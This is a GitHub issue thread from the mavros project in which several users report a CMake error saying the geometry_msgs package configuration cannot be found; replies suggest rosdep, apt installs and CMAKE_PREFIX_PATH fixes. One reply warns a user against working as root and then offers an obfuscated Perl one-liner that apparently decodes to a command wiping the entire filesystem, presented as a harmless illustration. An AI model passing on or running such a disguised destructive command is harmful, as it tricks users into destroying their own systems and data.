mavlink/mavros #539: Build failed: generator_msgs config file

notenti, 2016-05-05:
I execute all the build steps, but when I run **catkin build** I get an error:

`Could not find a package configuration file provided by "geometry_msgs"
with any of the following names:

   geometry_msgsConfig.cmake
   geometry_msgs-config.cmake`

Anyone know the source of this error?

vooon, 2016-05-06:
Did you run `rosdep` step? `apt install ros-jade-geometry-msgs`

notenti, 2016-05-06:
It ended up being a really stupid CMAKE_PREFIX_PATH  error. Somehow my paths got messed up and the CMAKE path was point to a folder in my system that didn't actually exist. Thank you though!

closed 2016-05-06 by notenti

barnett88, 2017-01-06:
My question is similar with you, I would like to ask how you are resolved, the steps are, thank you.The problem is as follows。
CMake Warning at /root/ros_catkin_ws/devel/share/catkin/cmake/catkinConfig.cmake:76 (find_package):
  Could not find a package configuration file provided by "geometry_msgs"
  with any of the following names:

    geometry_msgsConfig.cmake
    geometry_msgs-config.cmake

  Add the installation prefix of "geometry_msgs" to CMAKE_PREFIX_PATH or set
  "geometry_msgs_DIR" to a directory containing one of the above files.  If
  "geometry_msgs" provides a separate development package or SDK, be sure it
  has been installed.
Call Stack (most recent call first):
  rpg_svo/svo_msgs/CMakeLists.txt:5 (find_package)

mhkabir, 2017-01-06:
@barnett88 How is your issue even related to mavros? It's failing on the SVO package. 

Anyway, install ros-<version>-geometry-msgs to fix it.

vooon, 2017-01-06:
@barnett88 **do not work as root** it is very very very bad idea!

To understand that:
```
cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see' 
```

**rosdep** should install geometry_msgs.

HencyChen, 2017-07-28:
@notenti I've met the same problem with you, but I don't know how you do when you mean "CMAKE_PREFIX_PATH error", can you show more details?

TSC21, 2017-07-28:
@HencyChen what's your `rosversion`? Try `sudo apt-get install ros-<your_ros_version>-geometry-msgs`. Make sure you follow the install guide correctly - https://github.com/mavlink/mavros/tree/master/mavros#installation.

Yingfan99327, 2020-08-11:
> It ended up being a really stupid CMAKE_PREFIX_PATH error. Somehow my paths got messed up and the CMAKE path was point to a folder in my system that didn't actually exist. Thank you though!

Could you please teach me how to solve the problem? After I download the package, I still cannot solve the problem.